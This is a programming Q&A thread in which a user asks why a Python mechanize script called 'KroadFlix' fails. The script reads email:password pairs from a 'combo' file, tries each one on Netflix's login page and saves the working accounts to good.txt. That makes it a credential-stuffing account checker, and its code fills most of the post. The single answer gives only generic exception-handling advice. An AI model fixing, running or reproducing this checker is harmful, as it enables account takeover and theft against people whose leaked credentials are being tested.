# This Python program isnt working and their is no apparent reason

Tags: python, browser, mechanize-python, www-mechanize-firefox

I found this code online and I tried my best to patch it. I don't understand whats wrong with this program. This code takes in Netflix accounts and outputs the working accounts.

```
import mechanize
import sys
import time
from colorama import init, Fore, Style
init()

header = Fore.CYAN + """


    __ __                      ___________     
   / //_/_________  ____ _____/ / ____/ (_)  __
  / ,<  / ___/ __ \/ __ `/ __  / /_  / / / |/_/
 / /| |/ /  / /_/ / /_/ / /_/ / __/ / / />  <  
/_/ |_/_/   \____/\__,_/\__,_/_/   /_/_/_/|_|  
                                               


""" 
Fore.LIGHTGREEN_EX
user = input('Enter Your Name: ')
print Fore.LIGHTGREEN_EX + 'Welcome' , user , 'in KroadFlix'

print (header)
time.sleep(2)
accex=0
accno=0

accPass=[]
outfile = open('good.txt', 'w')


br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Firefox')]
try:
    with open('combo.txt', "r") as filestream:
        for line in filestream:
            br.open('https://www.netflix.com/Login?locale=es-CL')
            currentline = line.split(':')
            br.select_form(nr=0)
            br.form['email'] = currentline[0]
            br.form['password'] = currentline[1]
            print (Fore.YELLOW + 'Checking: '+br.form['email'])
            response = br.submit()
            if response.geturl()=='http://www.netflix.com/browse':
                print (Fore.GREEN + '[+]Account is working!')
                accex = accex + 1
                br.open('http://www.netflix.com/SignOut?lnkctr=mL')
                accPass.append(currentline[0]+':'+currentline[1])
            else:
                print (Fore.RED + '[-]Account is not working!')
                accno = accno + 1
                
    print ('Saving Good Accounts Into txt..')
    for all in accPass:
        print (all)
        outfile.write(str(all)+'\n')
except:
    print ('ERROR..')
    print ('Check if your combo named as combo.txt')
    for all in accPass:
        outfile.write(str(all)+'\n')
    
print (Fore.GREEN + 'Active Accounts: ' + str(accex))
print (Fore.RED + 'Bad Accounts: ' + str(accno))
```

This is the error it outputs.

```
ERROR..
Check if your combo named as combo.txt
Active Accounts: 0
Bad Accounts: 0
```

I do have a file called combo.txt in the directory so I don't understand what's wrong here

Comment: When you catch an exception you should examine it to find our what went wrong.

Answer (score 1):

There's "no apparent reason" because the author displays a single canned message for all possible failures, even when inapplicable. For example, even after successfully opening the file, the advice is to check you have that file.

At the very least the exception handler should display the exception message.  But it's Python, so you can readily do that yourself.

My money's on the 'br.open()' call failing.

Comment: I tried running the code line by line on a new page and each piece worked but when combined they didn't work. Might be because it was coded in python2 and I had to transfer it